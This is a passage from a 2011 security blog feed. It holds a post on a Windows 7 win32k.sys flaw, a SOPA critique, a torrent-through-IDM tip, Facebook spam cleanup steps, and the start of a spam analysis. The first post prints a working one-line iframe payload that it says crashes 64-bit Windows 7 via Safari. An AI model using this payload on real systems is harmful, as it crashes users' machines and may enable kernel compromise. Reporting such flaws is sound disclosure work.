left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt; &lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-dSYzfJaAguQ/TvbynfxjC7I/AAAAAAAABAA/62zBHfr85c8/s1600/screen.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-dSYzfJaAguQ/TvbynfxjC7I/AAAAAAAABAA/62zBHfr85c8/s1600/screen.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: inherit; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: inherit; font-size: large;&quot;&gt;&amp;lt;iframe height=&#39;18082563&#39;&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Yea that&#39;s true. This small ( not exactly small) iframe is powerful enough to crash down a 64 bit Win7 system to the famous Blue Screen Of Death (BSoD). This vulnerability has been recently reported by &lt;a href=&quot;https://twitter.com/#!/w3bd3vil/status/148454992989261824&quot; target=&quot;_blank&quot;&gt;w3bd3vil&lt;/a&gt; (awsome work!!)&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;This has been tested on Windows 7, 64 bit version, running Safari. I hate the blue screen of death so didnt bother about testing it on other browsers. Microsoft is still accessing the impact of vulnerability. Here are the details from a security advisory.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Description&lt;/b&gt;&lt;br /&gt;A vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user&#39;s system.&lt;br /&gt;&lt;br /&gt;The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large &quot;height&quot; attribute viewed using the Apple Safari browser.&lt;br /&gt;&lt;br /&gt;Successful exploitation may allow execution of arbitrary code with kernel-mode privileges.&lt;br /&gt;&lt;br /&gt;The vulnerability is confirmed on a fully patched Windows 7 Professional 64-bit. Other versions may also be affected.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Solution&lt;/b&gt;&lt;br /&gt;No effective solution is currently available.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Provided and/or discovered by&lt;/b&gt;&lt;br /&gt;webDEViL&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Original Advisory&lt;/b&gt;&lt;br /&gt;https://twitter.com/#!/w3bd3vil/status/148454992989261824&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/8044439991634909724/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/simple-html-tag-to-crash-64-bit-windows.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8044439991634909724'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/8044439991634909724'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/simple-html-tag-to-crash-64-bit-windows.html' title='A simple HTML tag to crash 64-bit Windows 7'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-dSYzfJaAguQ/TvbynfxjC7I/AAAAAAAABAA/62zBHfr85c8/s72-c/screen.jpg" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-7038218331763209466</id><published>2011-12-24T01:36:00.001+05:30</published><updated>2011-12-24T02:00:25.178+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="internet censorship"/><category scheme="http://www.blogger.com/atom/ns#" term="SOPA"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>SOPA - the end of internet as we know it!!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-0RRWNUHFqMQ/TvTelq_HmAI/AAAAAAAAA_g/JHb3nLtPLs0/s1600/sopa.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-0RRWNUHFqMQ/TvTelq_HmAI/AAAAAAAAA_g/JHb3nLtPLs0/s1600/sopa.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Imagine an internet where you dont have video uploading websites youtube or vomio. Imagine an internet where you dont have photo uploading sites like flickr and photobucket. Imagine an internet where you can blog not by your choice, but by that or others. At the worse imagine an internet where a Google search for &quot;download Firefox&quot; will return no results.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;An internet of this kind will not be far away if SOPA becomes a law. Let me start with the beginning. What exactly is SOPA. What restrictions it will impose and what pos and cons will it have on the present internet scenario.&lt;br /&gt;&lt;br /&gt;The Stop Online Piracy Act (SOPA), also known as H.R. 3261, is a bill that was introduced in the United States House of Representatives on October 26, 2011, by Representative Lamar Smith. The bill expands the ability of U.S. law enforcement and copyright holders to fight online trafficking in copyrighted intellectual property and counterfeit goods.&lt;br /&gt;Lets make it simple and Indian. If you post anything on your blog that is a copyright material then you can face trial if the copyright owner complaints about it. In the simplest of cases you will have to remove your website/blog, and in worse situations you can face trial as well.&amp;nbsp;The bill would allow the U.S. Department of Justice, as well as copyright holders, to seek court orders against websites accused of enabling or facilitating copyright infringement. Depending on who requests the court orders, the actions could include barring online advertising networks and payment facilitators such as PayPal from doing business with the allegedly infringing website, barring search engines from linking to such sites, and requiring Internet service providers to block access to such sites. The bill would make unauthorized streaming of copyrighted content a felony. The bill also gives immunity to Internet services that voluntarily take action against websites dedicated to infringement, while making liable for damages any copyright holder who knowingly misrepresents that a website is dedicated to infringement. This bill will give full internet censorship to USA. This bill clearly protects the rights of US intellectual property holders around the globe. A copyright owner of USA can sue a person in India through this bill. I would say this is America&#39;s own version of &quot;The great Firewall of China&quot;.&lt;br /&gt;&lt;br /&gt;The bill has met with lots of protest, especially online. In one of the most popular cases, Godaddy, a famous domain service provider who supported this bill is now facing a mass boycott. People are shifting their domains from Godaddy to other service providers. The big shocker came when companies like Microsoft, Apple, Adobe and other 26 giants silently supported the bill. I will explain you why they are in support. The opposing companies published a complete add in the New York Times (nice to see Facebook and Google standing together):&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-T8xoWA5yMjo/TvTX27sVmII/AAAAAAAAA_U/FnTCWYb2QmE/s1600/add.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;http://3.bp.blogspot.com/-T8xoWA5yMjo/TvTX27sVmII/AAAAAAAAA_U/FnTCWYb2QmE/s640/add.jpg&quot; width=&quot;374&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Why SOPA can be a danger to internet?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Let&#39;s look at the following points to understand how this bill can be a danger to the present internet.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Bill targets more than infringing website&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;A Center for Democracy and Technology paper says that the bill &quot;targets an entire website even if only a small portion hosts or links to some infringing content.&quot; What does this means? If someone posts a video on youtube that infringes copyright then the entire youtube can be brought down under this act ( nop I am in no mood for kidding !!). Well this is crazy. I think now you might have understood why Microsoft is supporting the bill. Even though a recent&amp;nbsp;amendment&amp;nbsp;says that the bill will not affect websites which publishes user content. So this can protect youtube,facebook etc but the bill still lays concerns about how these websites should deal with infringing content. In an excellent post, EFF has clearly mentioned how websites like vimeo, flickr and Etsy can face troubles. &lt;a href=&quot;https://www.eff.org/deeplinks/2011/11/whats-blacklist-three-sites-sopa-could-put-risk&quot; target=&quot;_blank&quot;&gt;Read the article here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DNS filtering&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The bill says that DNS servers should filter any request from users that directs to websites which break copyrights. This means that USA can alone control the web traffic of the world to any domain or subdomain (seriously I am not kidding!!). This is clearly the biggest reason why this bill is facing a mass opposition from countries like Japan, Russia etc.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Threat to E-commerce&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Sites like Ebay and amazon sell millions of products online. They contain all types of items that you can think of. Filtering contents based on copyright will be a nightmare for such companies. It will kill lot or company resource and money. Mid-size and smaller E-commerce websites will have no choice other than selling only branded products or shut down their business. (no point of kidding!!)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Threat to Online Gaming, Cloud computing and free web hosting&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;People have talked less about this on the internet but I want to shed some light on this issue as well. Cloud technology is greatly facilitating small and mid scale companies to run their business without worrying about resource problems. But SOPA can greatly affect the cloud market&amp;nbsp;drastically. All the major cloud players are based in USA and if this act becomes a law then these companies will have to filter any content on the cloud that can infringe copyright. Now the question arises, how can these cloud service providing companies access the data of their customers? Will it not kill the very meaning of cloud? Why will I host my business data on a USA based cloud computing company then? (tough to say that I am not kidding!!)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Threat to information&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Last but not the least. As I said earlier that this bill will create America&#39;s version of &quot;The Great Firewall of China&quot; as it will force the DNS servers to filter out any copyright infringing website/blog from its users. Search engines like Google and Yahoo! will have to start filtering for search contents. Well the question again comes. Can you imagine how much resource will be needed to filter out 32 million US requests every minute for Google.&lt;br /&gt;&lt;br /&gt;SOPA has really created a dirty scene on the internet. Looking at the mass protest against this bill, Microsoft and Apple have finally showed some support for the bill by saying that &quot;It needs to be worked on&quot;. But this is not enough. Maybe its the time when all the internet companies should stand up together and forget their&amp;nbsp;rivalry&amp;nbsp;and greed for some time because if this Act becomes a Law then Only God Can Save The INTERNET.&lt;br /&gt;You can read the complete SOPA Act here. &lt;a href=&quot;http://judiciary.house.gov/hearings/pdf/112%20HR%203261.pdf&quot; target=&quot;_blank&quot;&gt;Download.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-FQHe8_aMf30/TvTe0lcRI3I/AAAAAAAAA_0/lOdSkHsJwbc/s1600/sopa2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-FQHe8_aMf30/TvTe0lcRI3I/AAAAAAAAA_0/lOdSkHsJwbc/s1600/sopa2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/7038218331763209466/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/sopa-end-of-internet-as-we-know-it.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/7038218331763209466'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/7038218331763209466'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/sopa-end-of-internet-as-we-know-it.html' title='SOPA - the end of internet as we know it!!'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-0RRWNUHFqMQ/TvTelq_HmAI/AAAAAAAAA_g/JHb3nLtPLs0/s72-c/sopa.PNG" height="72" width="72"/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-3032947020020653169</id><published>2011-12-19T12:04:00.000+05:30</published><updated>2011-12-19T12:04:22.460+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="tips and tricks"/><title type='text'>Downloading torrent files through IDM</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;br /&gt;I know, I know, I know that this is an old trick but I really had nothing new to post. I have been busy with my book so its getting tough to find out time for something new. But I will keep you posted with some new posts soon. Lets come back to today&#39;s post. Special thanks to - Hackdigital.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. First of all , you have to download the torrent file(.torrent) which you want to download.&lt;br /&gt;&lt;br /&gt;2. Then just go to the website &lt;a href=&quot;http://www.torcache.net/&quot;&gt;www.torcache.net&lt;/a&gt; and upload the torrent file that you have just downloaded and click on the cache! button&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-gepevynDw-s/Tu7Z3lLtfTI/AAAAAAAAA_A/YHeJUOW-PX4/s1600/torcache.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;312&quot; src=&quot;http://3.bp.blogspot.com/-gepevynDw-s/Tu7Z3lLtfTI/AAAAAAAAA_A/YHeJUOW-PX4/s640/torcache.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. This will give you a new torrent file . You just have to copy the link of the new torrent file from the opened window.&lt;br /&gt;&lt;br /&gt;4. Then go to the website &lt;a href=&quot;http://www.torrific.com/&quot;&gt;www.torrific.com&lt;/a&gt; and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-Z-xNa0Rdbvk/Tu7aSkBelHI/AAAAAAAAA_I/zqpDkhdqZAg/s1600/torrific.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;260&quot; src=&quot;http://3.bp.blogspot.com/-Z-xNa0Rdbvk/Tu7aSkBelHI/AAAAAAAAA_I/zqpDkhdqZAg/s640/torrific.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.&lt;br /&gt;&lt;br /&gt;Now enjoy the ultimate Speed of IDM for downloading torrents too.&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/3032947020020653169/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/downloading-torrent-files-through-idm.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/3032947020020653169'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/3032947020020653169'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/downloading-torrent-files-through-idm.html' title='Downloading torrent files through IDM'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-gepevynDw-s/Tu7Z3lLtfTI/AAAAAAAAA_A/YHeJUOW-PX4/s72-c/torcache.jpg" height="72" width="72"/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-6936503226816985172</id><published>2011-12-16T15:17:00.000+05:30</published><updated>2011-12-17T14:06:25.477+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="facebook spam"/><title type='text'>5 Things to do when you are hit by a Facebook spam</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s1600/download&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s1600/download&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;These days there are two things that are spreading fast on facebook:&lt;br /&gt;First is the spam containing inappropriate content.&lt;br /&gt;Second is the photo people are sharing after they are hit by the spam( and putting all blame on hackers).&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Recently one of my friends pointed out a strange thing happening with his account. He tried to delete the spam but in turn it started spreading through his profile even though he didn&#39;t click the spam link. Well its tough to tell why this is happening but his problem shifted my&amp;nbsp;attention&amp;nbsp;back to the spam codes where &amp;nbsp;found a&amp;nbsp;buried&amp;nbsp;script which was doing quiet a fun with the cookies. I didn&#39;t notice that script while I posted about the &quot;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/12/it-happens-on-live-television-facebook.html&quot; target=&quot;_blank&quot;&gt;This&amp;nbsp;happens&amp;nbsp;on live television spam&lt;/a&gt;&quot;. Later today my friends problem brought my attention to that script. Anyways I dont want this tutorial to turn too geeky so I will speak simple language.&lt;br /&gt;Lets talk about 5 things that you can do to completely get rid of the spam in case you accidently( or knowingly) clicked it. The steps mentioned here are in order. So if you are a victim then follow all the five steps starting from step 1.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;1. Report as spam&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;(special thanks-sami ullah)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This is the first&amp;nbsp;precautionary&amp;nbsp;step. Immideatley report the spam to facebook( dont click on delete). Reporting as spam automatically hides the link from your feed so dont take the risk of deleting it.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-Bn8UphEOjFQ/TusP5-6c8LI/AAAAAAAAA-Q/2FtFzrT4hds/s1600/spam1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;124&quot; src=&quot;http://3.bp.blogspot.com/-Bn8UphEOjFQ/TusP5-6c8LI/AAAAAAAAA-Q/2FtFzrT4hds/s320/spam1.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;2. Disable the installed plugin&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;The recent spam asks you to install a missing plugin. So in case you have installed it, act fast to remove it. If you &amp;nbsp;are using firefox then go to Firefox &amp;gt; Add-ons &amp;gt; Extensions . Here you will find the malicious plugin. Click on Remove to get rid of it.&lt;br /&gt;For Crome users, click on the small Wrench(Rinch) icon at the right corner of the browser, then click on options and move to Extensions. Disable and remove the plugin from there.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;3. Switch to Https&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Immideately switch to https version of facebook if you still haven&#39;t. This will prevent any kind of session hijacking and will prevent the http cookies created by the spam in your system to re-post the link on the profile.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;4. Clear Cookies, Browsing history and Browser cache&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;(special Thanks - Aquib Ahmed)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The spam creates lots of fake facebook http cookies on your system which can re-post the spam links on your profile and can redirect you to other links as well. So it is highly recommended that you delete all the browser cookies. Clearing history can also help in cases where you may again accidently click the link.&lt;br /&gt;You can go to Browser options to clear the cookies, history etc.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;5. Change the password&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Last but not the least. Change the facebook password. Your facebook account is precious to you so why to take the risk.&lt;br /&gt;&lt;br /&gt;These are a few steps you can follow to protect your account from spams. In case you have any other problem related to spam on your profile then add your comment here.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;Update : Thanks to Anna.L.Walls&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/6936503226816985172/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/5-things-to-do-when-you-are-hit-by.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6936503226816985172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6936503226816985172'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/5-things-to-do-when-you-are-hit-by.html' title='5 Things to do when you are hit by a Facebook spam'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s72-c/download" height="72" width="72"/><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-8416719529555694222</id><published>2011-12-13T03:25:00.000+05:30</published><updated>2011-12-13T03:25:06.365+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="facebook hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="facebook spam"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><title type='text'>&quot;It Happens on Live television&quot; Facebook spam demystified - A completely new form of Spam</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s1600/download&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-A5E1klPSie4/Trl6BKRUsoI/AAAAAAAAA4w/_U-77RYt7hc/s1600/download&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hello friends. I love facebook spams. The reason is that you will find the best use of javascript, flash, facebook plugins and of&amp;nbsp;coarse social engineering. There is always so much to learn. The last faebook spam which we looked at here in HackingAlert was the &quot;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/11/new-how-can-rihanna-do-this-facebook.html&quot; target=&quot;_blank&quot;&gt;How can Rehanna Do this&lt;/a&gt;&quot; Facebook spam.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;It was a browser vulnerability which was floating around for some days. Fortunately only Crome and safari were affected by that attack and it has been fixed now. Companies try real hard to fix all holes. But&amp;nbsp;ultimately the security lies in you.&lt;br /&gt;&lt;br /&gt;The recent spam is clearly the best spam ever flooded the social platform. It has been&amp;nbsp;crafted&amp;nbsp;very nicely and&amp;nbsp;trickly.&amp;nbsp; Lets&amp;nbsp;demystify&amp;nbsp;the spam and dig deeper into how the creators built this yet another headache for facebook. This time the target have been Firefox and Crome users.&lt;br /&gt;&lt;br /&gt;As usual once you click on the malicious link, you will be asked to share it with your friends before you can watch. Here lies the first trap. Once you share it, you are pushed out of the platform to a blogspot link where you will be asked to download a plugin before you can watch the video. Even the plugin has been named as &quot;youtube premium plugin&quot;(Hats of to the thinker of this name :-) ). Look at the picture below. There are 3 things to notice in this.&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-G8plQ_DSaEE/TuZq5uNEBuI/AAAAAAAAA9w/0UjUwkQDPDU/s1600/spam1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;364&quot; src=&quot;http://2.bp.blogspot.com/-G8plQ_DSaEE/TuZq5uNEBuI/AAAAAAAAA9w/0UjUwkQDPDU/s640/spam1.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br 